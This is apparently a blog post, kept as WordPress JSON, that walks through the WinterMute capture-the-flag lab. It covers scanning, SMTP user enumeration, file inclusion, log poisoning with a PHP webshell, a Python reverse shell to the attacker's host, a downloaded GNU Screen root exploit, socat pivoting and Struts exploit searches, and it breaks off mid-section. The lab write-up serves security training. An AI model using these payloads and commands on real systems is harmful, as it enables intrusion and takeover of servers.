{"id":439,"date":"2024-05-18T23:01:29","date_gmt":"2024-05-18T15:01:29","guid":{"rendered":"http:\/\/xiyu12.top\/?p=439"},"modified":"2024-05-18T23:01:29","modified_gmt":"2024-05-18T15:01:29","slug":"wintermute","status":"publish","type":"post","link":"http:\/\/www.xiyu12.top\/?p=439","title":{"rendered":"WinterMute"},"content":{"rendered":"\n<ul class=\"wp-block-list\">\n<li><strong>Name<\/strong>: WinterMute: 1<\/li>\n\n\n\n<li><strong>Date release<\/strong>: 5 Jul 2018<\/li>\n\n\n\n<li><strong>Author<\/strong>:&nbsp;creosote<\/li>\n\n\n\n<li><strong>Series<\/strong>:&nbsp;WinterMute<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">Two machines: Straylight and Neuromancer.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Straylight &#8211; simulates a public facing server with 2 NICS. Cap this first, then pivot to the final machine. Neuromancer &#8211; is within a non-public network with 1 NIC. Your Kali box should ONLY be on the same virtual network as Straylight.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Kali VM (bridged): 192.168.38.107<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Straylight VBox (bridged and host-only): 192.168.38.238<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Neuromancer VBox (host-only)<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">1. Information gathering (Straylight)<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>sudo nmap -sT --min-rate 10000 
-p- 192.168.38.238        \n&#91;sudo] password for user: \nStarting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-05-18 20:58 CST\nNmap scan report for 192.168.38.238\nHost is up (0.00055s latency).\nNot shown: 65528 closed tcp ports (conn-refused)\nPORT     STATE SERVICE\n25\/tcp   open  smtp\n80\/tcp   open  http\n3000\/tcp open  ppp\nMAC Address: 08:00:27:50:96:D9 (Oracle VirtualBox virtual NIC)\n<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>sudo nmap -sC -sV -p 80,25,3000 192.168.38.238\nStarting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-05-18 21:00 CST\nNmap scan report for 192.168.38.238\nHost is up (0.00028s latency).\n\nPORT     STATE SERVICE            VERSION\n25\/tcp   open  smtp               Postfix smtpd\n|_ssl-date: TLS randomness does not represent time\n|_smtp-commands: straylight, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8\n80\/tcp   open  http               Apache httpd 2.4.25 ((Debian))\n|_http-title: Night City\n|_http-server-header: Apache\/2.4.25 (Debian)\n3000\/tcp open  hadoop-tasktracker Apache Hadoop\n| hadoop-datanode-info: \n|_  Logs: submit\n| hadoop-tasktracker-info: \n|_  Logs: submit\n|_http-trane-info: Problem with XML parsing of \/evox\/about\n| http-title: Welcome to ntopng\n|_Requested resource was \/lua\/login.lua?referer=\/\nMAC Address: 08:00:27:50:96:D9 (Oracle VirtualBox virtual NIC)\nService Info: Host:  straylight\n\nService detection performed. 
Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 24.12 seconds\n<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Port 25: SMTP (mail service)<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Port 80: Apache (web service)<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Port 3000: reported as hadoop-tasktracker \/ Apache Hadoop, serving a web page<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">SMTP user enumeration<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>smtp-user-enum -M VRFY -U   \/usr\/share\/wordlists\/metasploit\/unix_users.txt  -t 192.168.38.238\nStarting smtp-user-enum v1.2 ( http:\/\/pentestmonkey.net\/tools\/smtp-user-enum )\n\n ----------------------------------------------------------\n|                   Scan Information                       |\n ----------------------------------------------------------\n\nMode ..................... VRFY\nWorker Processes ......... 5\nUsernames file ........... \/usr\/share\/wordlists\/metasploit\/unix_users.txt\nTarget count ............. 1\nUsername count ........... 168\nTarget TCP port .......... 25\nQuery timeout ............ 5 secs\nTarget domain ............ 
\n\n######## Scan started at Sat May 18 22:16:41 2024 #########\n192.168.38.238: _apt exists\n192.168.38.238: backup exists\n192.168.38.238: bin exists\n192.168.38.238: daemon exists\n192.168.38.238: games exists\n192.168.38.238: gnats exists\n192.168.38.238: irc exists\n192.168.38.238: list exists\n192.168.38.238: lp exists\n192.168.38.238: man exists\n192.168.38.238: mail exists\n192.168.38.238: messagebus exists\n192.168.38.238: mysql exists\n192.168.38.238: news exists\n192.168.38.238: nobody exists\n192.168.38.238: postfix exists\n192.168.38.238: postgres exists\n192.168.38.238: postmaster exists\n192.168.38.238: proxy exists\n192.168.38.238: root exists\n192.168.38.238: ROOT exists\n192.168.38.238: sync exists\n192.168.38.238: sys exists\n192.168.38.238: systemd-bus-proxy exists\n192.168.38.238: systemd-resolve exists\n192.168.38.238: systemd-timesync exists\n192.168.38.238: systemd-network exists\n192.168.38.238: uucp exists\n192.168.38.238: www-data exists\n######## Scan completed at Sat May 18 22:16:42 2024 #########\n29 results.\n\n168 queries in 1 seconds (168.0 queries \/ sec)\n<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Extract the usernames from the saved output: <code>cat smtp | cut -d ' ' -f 2 &gt;&gt; smtp_user<\/code><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Directory scan<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code> gobuster dir -u http:\/\/192.168.38.238\/ --wordlist=\/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x .txt,.html,.php \n==================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/.php                 (Status: 403) &#91;Size: 293]\n\/index.html           (Status: 200) &#91;Size: 326]\n\/.html                (Status: 403) &#91;Size: 294]\n\/manual               (Status: 301) &#91;Size: 317] &#91;--&gt; http:\/\/192.168.38.238\/manual\/]\n\/freeside             (Status: 301) &#91;Size: 319] &#91;--&gt; http:\/\/192.168.38.238\/freeside\/]\n\/.php                 
(Status: 403) &#91;Size: 293]\n\/.html                (Status: 403) &#91;Size: 294]\n\/server-status        (Status: 403) &#91;Size: 302]\nProgress: 882240 \/ 882244 (100.00%)\n===============================================================\nFinished\n===============================================================\n<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Found http:\/\/192.168.38.238\/freeside\/<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Visited port 3000 at http:\/\/192.168.38.238:3000 and found that the default credentials admin:admin work; logged in.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img src=\"http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/05\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2024-05-18-211444-1024x681.png\" alt=\"\" class=\"wp-image-440\"\/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\"><code>ntop<\/code> is an open-source network traffic monitoring tool that provides a simple way to view network usage. <code>ntop<\/code> can display real-time and historical traffic data in a web interface, letting administrators analyse and monitor network activity.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Several paths can be seen there, including \/turing-bolo\/<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img src=\"http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/05\/image-5.png\" alt=\"The alt attribute of this image is empty; the file name is -2024-05-18-212547-1024x594.png\" class=\"wp-image-443\"\/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">Visit http:\/\/192.168.38.238\/turing-bolo\/<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img src=\"http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/05\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2024-05-18-221458-1024x625.png\" alt=\"\" class=\"wp-image-442\"\/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">This looks like a file inclusion: http:\/\/192.168.38.238\/turing-bolo\/bolo.php?bolo=case<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">http:\/\/192.168.38.238\/turing-bolo\/bolo.php?bolo=..\/..\/..\/..\/etc\/passwd<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">The php:\/\/filter\/convert.base64-encode\/resource= pseudo-protocol (PHP wrapper)<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">http:\/\/192.168.38.238\/turing-bolo\/bolo.php?bolo=php:\/\/filter\/convert.base64-encode\/resource=..\/..\/..\/etc\/passwd does not manage to include the file<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img src=\"http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/05\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2024-05-18-222229.png\" alt=\"\" class=\"wp-image-444\"\/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img src=\"http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/05\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2024-05-18-222611-1024x465.png\" alt=\"\" class=\"wp-image-445\"\/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>Directory guessing<\/strong><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Based on molly.log, armitage.log and riviera.log seen above, there should be log files.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>Common log file paths\nSystem log files:\n\/var\/log\/syslog: general system log (common on Debian and Ubuntu).\n\/var\/log\/messages: general system log (common on Red Hat and CentOS).\n\/var\/log\/dmesg: kernel and boot message log.\nApplication log files:\n\/var\/log\/auth.log: authentication-related log (common on Debian and Ubuntu).\n\/var\/log\/secure: authentication-related log (common on Red Hat and CentOS).\n\/var\/log\/apache2\/: log directory of the Apache HTTP server (Debian and Ubuntu).\n\/var\/log\/apache2\/access.log: Apache access log.\n\/var\/log\/apache2\/error.log: Apache error log.\n\/var\/log\/httpd\/: log directory of the Apache HTTP server (Red Hat and CentOS).\n\/var\/log\/nginx\/: Nginx log directory.\n\/var\/log\/nginx\/access.log: Nginx access log.\n\/var\/log\/nginx\/error.log: Nginx error log.\n\/var\/log\/mysql\/: MySQL log directory.\n\/var\/log\/mysql\/error.log: MySQL error log.\nUser-defined application logs:\n\/var\/log\/: many users and applications store their log files in this directory.\n\/home\/&lt;username&gt;\/logs\/: log files in a user's home directory (depending on the application's configuration).\nHow to find log file paths\n1. Check the application's configuration file\nMost applications have a configuration file that specifies where the log file lives. Common configuration file paths include:\nApache configuration (e.g. \/etc\/apache2\/apache2.conf or \/etc\/httpd\/conf\/httpd.conf).\nNginx configuration (e.g. \/etc\/nginx\/nginx.conf).\nMySQL configuration (e.g. \/etc\/mysql\/my.cnf or \/etc\/my.cnf).\nFor example, check Apache's configuration file to find the log file path:\nExample: viewing ntop or ntopng logs\nIf you are looking for the ntop or ntopng log file path, check its configuration file (e.g. \/etc\/ntopng\/ntopng.conf) or the usual log location (e.g. \/var\/log\/ntopng\/):\n<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Since this is a web page, one guess is the Apache log, \/var\/log\/apache2\/molly.log. Not it.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Or perhaps the ntop log: \/etc\/ntopng\/ntopng.conf, \/etc\/ntopng\/molly.log. Not it either.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">I would never have guessed it: it is the mail service (SMTP) log.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\/var\/log\/mail.log, \/log\/mail.log, \/log\/mail with no suffix, and it starts with \/log. Tough one; I simply could not have guessed it.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>Postfix\nPostfix is a commonly used SMTP server; its logs are usually written under \/var\/log.\nMain log file:\n\/var\/log\/mail.log (Debian\/Ubuntu)\n\/var\/log\/maillog (CentOS\/Red Hat)\nExample of viewing the Postfix log:\ntail -f \/var\/log\/mail.log\nor on CentOS\/Red Hat:\ntail -f \/var\/log\/maillog\n2. Sendmail\nSendmail is another common SMTP server.\nMain log file:\n\/var\/log\/mail.log (Debian\/Ubuntu)\n\/var\/log\/maillog (CentOS\/Red Hat)\nExample of viewing the Sendmail log:\ntail -f \/var\/log\/mail.log\nor on CentOS\/Red Hat:\ntail -f \/var\/log\/maillog\n3. Exim\nExim is a highly configurable SMTP mail transfer agent.\nMain log file:\n\/var\/log\/exim4\/mainlog (Debian\/Ubuntu)\n\/var\/log\/exim\/mainlog (CentOS\/Red Hat)\nExample of viewing the Exim log:\ntail -f \/var\/log\/exim4\/mainlog\nor on CentOS\/Red Hat:\ntail -f \/var\/log\/exim\/mainlog\n4. Qmail\nQmail is a simple SMTP mail transfer agent.\nMain log file:\nlog files under the \/var\/log\/qmail directory\nExample of viewing the Qmail log:\ntail -f \/var\/log\/qmail\/current\nHow to find the log files\nIf you are not sure which SMTP server is in use, the following steps locate the relevant log files:\n1. Find the mail service\nCheck which mail service is currently running:\nps aux | grep -E 'postfix|sendmail|exim|qmail'\nThis shows the running mail server.\n2. Find the log path\nUse grep under \/etc to find log path settings in the configuration files:\ngrep -i 'log' \/etc\/postfix\/main.cf  # Postfix\ngrep -i 'log' \/etc\/sendmail\/sendmail.cf  # Sendmail\ngrep -i 'log' \/etc\/exim4\/exim4.conf  # Exim\ngrep -ri 'log' \/var\/qmail\/control\/  # Qmail (a directory, so recurse)\n3. Check the system log\nSometimes the mail server's log entries also end up in the system journal, which can be read with journalctl:\njournalctl -u postfix\njournalctl -u sendmail\njournalctl -u exim4\njournalctl -u qmail\nWith these methods you can locate the SMTP server's log files and read the relevant entries, which helps with debugging and monitoring mail delivery.<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><img src=\"http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/05\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2024-05-18-224532-1024x528.png\" alt=\"\" class=\"wp-image-446\"\/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">2. Getting a foothold (Straylight)<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Once I had this file inclusion, I connected it with the fact that this is a mail log and that there is also an SMTP service.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Something can be written into the log here so that, when the log is included, it becomes an executable file.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Write to the log via SMTP: <code>telnet 192.168.38.238 25<\/code><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>Trying 192.168.38.238...\nConnected to 192.168.38.238.\nEscape character is '^]'.\n220 straylight ESMTP Postfix (Debian\/GNU)\nhelo hack.com\n250 straylight\nmail from:hack@straylight\n250 2.1.0 Ok\nrcpt to:straylight\n550 5.1.1 &lt;straylight&gt;: Recipient address rejected: User unknown in local recipient table\nrcpt to:wintermute\n250 2.1.5 Ok\ndata \n354 End data with &lt;CR&gt;&lt;LF&gt;.&lt;CR&gt;&lt;LF&gt;\nsubjiec\uff1a&lt;?php system($_GET&#91;'a']);?&gt;\n.\n250 2.0.0 Ok: queued as 31731559D\nquit\n221 2.0.0 Bye\nConnection closed by foreign host.\n<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>python -c \"import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('192.168.38.107',1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(&#91;'\/bin\/bash','-i']);\"  # Python reverse shell<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><img src=\"http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/05\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2024-05-18-225823-1024x430.png\" alt=\"\" class=\"wp-image-447\"\/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">With <code>nc -lvp 1234<\/code> listening, we successfully get a shell as www-data.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">3. Privilege escalation (Straylight)<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>www-data@straylight:\/home$ find \/ -perm \/4000 2&gt;\/dev\/null\n\/bin\/su\n\/bin\/umount\n\/bin\/mount\n\/bin\/screen-4.5.0\n\/bin\/ping\n\/usr\/bin\/gpasswd\n\/usr\/bin\/chsh\n\/usr\/bin\/chfn\n\/usr\/bin\/passwd\n\/usr\/bin\/newgrp\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/lib\/eject\/dmcrypt-get-device\n\/usr\/lib\/openssh\/ssh-keysign\n<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\/bin\/screen-4.5.0 should be exploitable.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>searchsploit screen 4.5.0 \n----------------------------------------------------------------------\n\nGNU Screen 4.5.0 - Local Privilege Escalation | linux\/local\/41154.sh\n<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>python -m http.server 8000\nwget http:\/\/192.168.38.107:8000\/41154.sh\nchmod +x 41154.sh\n.\/41154.sh\n<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Got a shell with root privileges.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Next comes the lateral movement.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">1. Information gathering (Neuromancer)<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Internal network information gathering<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>root@straylight:\/root# cat note.txt \nDevs,\n\nLady 3Jane has asked us to create a custom java app on Neuromancer's primary server to help her interact w\/ the AI via a web-based GUI.\n\nThe engineering team couldn't strss enough how risky that is, opening up a Super AI to remote access on the Freeside network. It is within out internal admin network, but still, it should be off the network completely. For the sake of humanity, user access should only be allowed via the physical console...who knows what this thing can do.\n\nAnyways, we've deployed the war file on tomcat as ordered - located here:\n\n\/struts2_2.3.15.1-showcase\n\nIt's ready for the devs to customize to her liking...I'm stating the obvious, but make sure to secure this thing.\n\nRegards,\n\nBob Laugh\nTuring Systems Engineer II\nFreeside\/\/Straylight\/\/Ops5\n<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\/struts2_2.3.15.1-showcase: this gives us a directory name.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><code>ip a<\/code> shows that another network segment exists.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>root@straylight:\/etc# ip a \n1: lo: &lt;LOOPBACK,UP,LOWER_UP&gt; mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1\n    link\/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00\n    inet 127.0.0.1\/8 scope host lo\n       valid_lft forever preferred_lft forever\n    inet6 ::1\/128 scope host \n       valid_lft forever preferred_lft forever\n2: enp0s3: &lt;BROADCAST,MULTICAST,UP,LOWER_UP&gt; mtu 1500 qdisc pfifo_fast state UP group default qlen 1000\n    link\/ether 08:00:27:50:96:d9 brd ff:ff:ff:ff:ff:ff\n    inet 192.168.38.238\/24 brd 192.168.38.255 scope global enp0s3\n       valid_lft forever preferred_lft forever\n    inet6 2409:8950:1792:8c0:a00:27ff:fe50:96d9\/64 scope global mngtmpaddr dynamic \n       valid_lft 3407sec 
preferred_lft 3407sec\n    inet6 fe80::a00:27ff:fe50:96d9\/64 scope link \n       valid_lft forever preferred_lft forever\n3: enp0s8: &lt;BROADCAST,MULTICAST,UP,LOWER_UP&gt; mtu 1500 qdisc pfifo_fast state UP group default qlen 1000\n    link\/ether 08:00:27:a9:7a:f0 brd ff:ff:ff:ff:ff:ff\n    inet 192.168.56.5\/24 brd 192.168.56.255 scope global enp0s8\n       valid_lft forever preferred_lft forever\n    inet6 fe80::a00:27ff:fea9:7af0\/64 scope link \n       valid_lft forever preferred_lft forever\n<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Live host scan: <code>for i in $(seq 1 254); do ping -W 1 -c 1 192.168.56.$i | grep from ; done<\/code><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>root@straylight:\/etc# for i in {1..254}; do ping -c 1 -W 1 192.168.56.$i | grep from ; done \n64 bytes from 192.168.56.2: icmp_seq=1 ttl=255 time=0.194 ms\n64 bytes from 192.168.56.4: icmp_seq=1 ttl=64 time=0.351 ms\n64 bytes from 192.168.56.5: icmp_seq=1 ttl=64 time=0.018 ms\n<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Port scan: <code>nc.traditional -vv -z 192.168.56.4 1-65535 2&gt;&amp;1 | grep -v refused<\/code><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>root@straylight:\/etc# nc.traditional -vv -z 192.168.56.4 1-65535 2&gt;&amp;1 |grep -v refused\n192.168.56.4: inverse host lookup failed: Unknown host\n(UNKNOWN) &#91;192.168.56.4] 34483 (?) open\n(UNKNOWN) &#91;192.168.56.4] 8080 (http-alt) open\n(UNKNOWN) &#91;192.168.56.4] 8009 (?) 
open\n<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Then forward the internal network's traffic out.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>root@straylight:\/etc# socat TCP-LISTEN:5656,fork TCP4:192.168.56.4:8080&amp;\n&#91;1] 25705\nroot@straylight:\/etc# socat TCP-LISTEN:5655,fork TCP4:192.168.56.4:8009&amp;\n&#91;2] 25742\nroot@straylight:\/etc# socat TCP-LISTEN:5555,fork TCP4:192.168.56.4:34483&amp;\n&#91;3] 25761\n\nroot@straylight:\/root# socat TCP-LISTEN:1234,fork TCP4:192.168.38.107:1234&amp;\n&#91;4] 26616\n<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Continue the testing from Kali.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>sudo nmap -sC -sV -p 5656,5655,5555 192.168.38.238\n&#91;sudo] password for user: \nStarting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-05-18 15:32 CST\nNmap scan report for 192.168.38.238\nHost is up (0.00030s latency).\n\nPORT     STATE SERVICE VERSION\n5555\/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   2048 2e:9b:4a:a9:c0:fc:0b:d8:ef:f1:e3:9d:f4:59:25:32 (RSA)\n|   256 f6:2a:de:07:36:36:00:e9:b5:5d:2f:aa:03:79:91:d1 (ECDSA)\n|_  256 38:3c:a8:ed:91:ea:ce:1d:0d:0f:ab:51:ac:97:c8:fb (ED25519)\n5655\/tcp open  unknown\n5656\/tcp open  http    Apache Tomcat 9.0.0.M26\n|_http-title: Apache Tomcat\/9.0.0.M26\n|_http-favicon: Apache Tomcat\nMAC Address: 08:00:27:50:96:D9 (Oracle VirtualBox virtual NIC)\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel\n\nService detection performed. 
Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 12.18 seconds\n<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">5656: Tomcat 9.0 (web service)<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">5655: a companion service of Apache Tomcat 9.0.0.M26<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">5555: SSH service<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Tomcat 9.0 has a rather limited file inclusion: it can only include files under the Tomcat webapp directory.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>python2.7 CNVD-2020-10487-Tomcat-Ajp-lfi.py 192.168.38.238 -p 5655 -f \/WEB-INF\/web.xml\nGetting resource at ajp13:\/\/192.168.38.238:5655\/asdf\n----------------------------\n&lt;?xml version=\"1.0\" encoding=\"UTF-8\"?&gt;\n&lt;!--\n Licensed to the Apache Software Foundation (ASF) under one or more\n  contributor license agreements.  See the NOTICE file distributed with\n  this work for additional information regarding copyright ownership.\n  The ASF licenses this file to You under the Apache License, Version 2.0\n  (the \"License\"); you may not use this file except in compliance with\n  the License.  
You may obtain a copy of the License at\n\n      http:&#47;&#47;www.apache.org\/licenses\/LICENSE-2.0\n\n  Unless required by applicable law or agreed to in writing, software\n  distributed under the License is distributed on an \"AS IS\" BASIS,\n  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n  See the License for the specific language governing permissions and\n  limitations under the License.\n--&gt;\n&lt;web-app xmlns=\"http:\/\/xmlns.jcp.org\/xml\/ns\/javaee\"\n  xmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n  xsi:schemaLocation=\"http:\/\/xmlns.jcp.org\/xml\/ns\/javaee\n                      http:\/\/xmlns.jcp.org\/xml\/ns\/javaee\/web-app_4_0.xsd\"\n  version=\"4.0\"\n  metadata-complete=\"true\"&gt;\n\n  &lt;display-name&gt;Welcome to Tomcat&lt;\/display-name&gt;\n  &lt;description&gt;\n     Welcome to Tomcat\n  &lt;\/description&gt;\n\n&lt;\/web-app&gt;\n<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">The ROOT web.xml is the stock one, so the interesting content lives elsewhere. Visit the Struts2 showcase application deployed on the same Tomcat: http:\/\/192.168.38.238:5656\/struts2_2.3.15.1-showcase<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img src=\"http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/05\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2024-05-18-233410-1024x586.png\" alt=\"\" class=\"wp-image-452\"\/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">The application name gives away both the framework and its version: the Struts 2.3.15.1 showcase. That release falls inside the range affected by S2-045 (2.3.5 through 2.3.31), so searchsploit is the fastest way to find a matching remote code execution exploit:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>searchsploit struts  Remote Code Execution\n-------------------------------------------------------------------------------------------------- ---------------------------------\n Exploit Title                                                                                    |  Path\n-------------------------------------------------------------------------------------------------- ---------------------------------\nApache Struts - 'ParametersInterceptor' Remote Code Execution (Metasploit)                        | multiple\/remote\/24874.rb\nApache Struts - ClassLoader Manipulation Remote Code Execution (Metasploit)                       | multiple\/remote\/33142.rb\nApache Struts - Dynamic Method Invocation Remote Code Execution (Metasploit)                      | linux\/remote\/39756.rb\nApache Struts - includeParams Remote Code Execution (Metasploit)                                  | multiple\/remote\/25980.rb\nApache Struts - REST Plugin With Dynamic Method Invocation Remote Code Execution                  | multiple\/remote\/43382.py\nApache Struts - REST Plugin With Dynamic Method Invocation Remote Code Execution (Metasploit)     | 
multiple\/remote\/39919.rb\nApache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution (Metasploit)                   | multiple\/remote\/27135.rb\nApache Struts 2 - Skill Name Remote Code Execution                                                | multiple\/remote\/37647.txt\nApache Struts 2 - Struts 1 Plugin Showcase OGNL Code Execution (Metasploit)                       | multiple\/remote\/44643.rb\nApache Struts 2 - Struts 1 Plugin Showcase OGNL Code Execution (Metasploit)                       | multiple\/remote\/44643.rb\nApache Struts 2.0.1 &lt; 2.3.33 \/ 2.5 &lt; 2.5.10 - Arbitrary Code Execution                            | multiple\/remote\/44556.py\nApache Struts 2.3 &lt; 2.3.34 \/ 2.5 &lt; 2.5.16 - Remote Code Execution (1)                             | linux\/remote\/45260.py\nApache Struts 2.3 &lt; 2.3.34 \/ 2.5 &lt; 2.5.16 - Remote Code Execution (2)                             | multiple\/remote\/45262.py\nApache Struts 2.3.5 &lt; 2.3.31 \/ 2.5 &lt; 2.5.10 - Remote Code Execution                               | linux\/webapps\/41570.py\nApache Struts 2.3.x Showcase - Remote Code Execution                                              | multiple\/webapps\/42324.py\nApache Struts 2.5 &lt; 2.5.12 - REST Plugin XStream Remote Code Execution                            | linux\/remote\/42627.py\nApache Struts &lt; 1.3.10 \/ &lt; 2.3.16.2 - ClassLoader Manipulation Remote Code Execution (Metasploit) | multiple\/remote\/41690.rb\n-------------------------------------------------------------------------------------------------- ---------------------------------\nShellcodes: No Results\n<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Narrowing the search to the 2.3 branch:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>searchsploit struts 2.3  Remote Code Execution\n\n-------------------------------------------------------------------------------------------------- ---------------------------------\n Exploit Title                                                                                    |  Path\n-------------------------------------------------------------------------------------------------- ---------------------------------\nApache Struts 2.0.1 &lt; 2.3.33 \/ 2.5 &lt; 2.5.10 - Arbitrary Code Execution                            | multiple\/remote\/44556.py\nApache Struts 2.3 &lt; 2.3.34 \/ 2.5 &lt; 2.5.16 - Remote Code Execution (1)                             | linux\/remote\/45260.py\nApache Struts 2.3 &lt; 2.3.34 \/ 2.5 &lt; 2.5.16 - Remote Code Execution (2)                             | multiple\/remote\/45262.py\nApache Struts 2.3.5 &lt; 2.3.31 \/ 2.5 &lt; 2.5.10 - Remote Code Execution                               | linux\/webapps\/41570.py\nApache Struts 2.3.x Showcase - Remote Code Execution                                              | multiple\/webapps\/42324.py\nApache Struts &lt; 1.3.10 \/ &lt; 2.3.16.2 - ClassLoader Manipulation Remote Code Execution (Metasploit) | multiple\/remote\/41690.rb\n-------------------------------------------------------------------------------------------------- ---------------------------------\nShellcodes: No Results\n<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">The S2-045 exploit, 41570.py, covers 2.3.5 through 2.3.31 and therefore the 2.3.15.1 showcase. A harmless test command confirms code execution. Tomcat runs as the ordinary user ta rather than as root; its membership of adm and lxd is worth noting (the lxd group is a well-known privilege-escalation route on its own, although it is not used here):<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>Apache Struts 2.3.5 &lt; 2.3.31 \/ 2.5 &lt; 2.5.10 - Remote Code Execution                               | 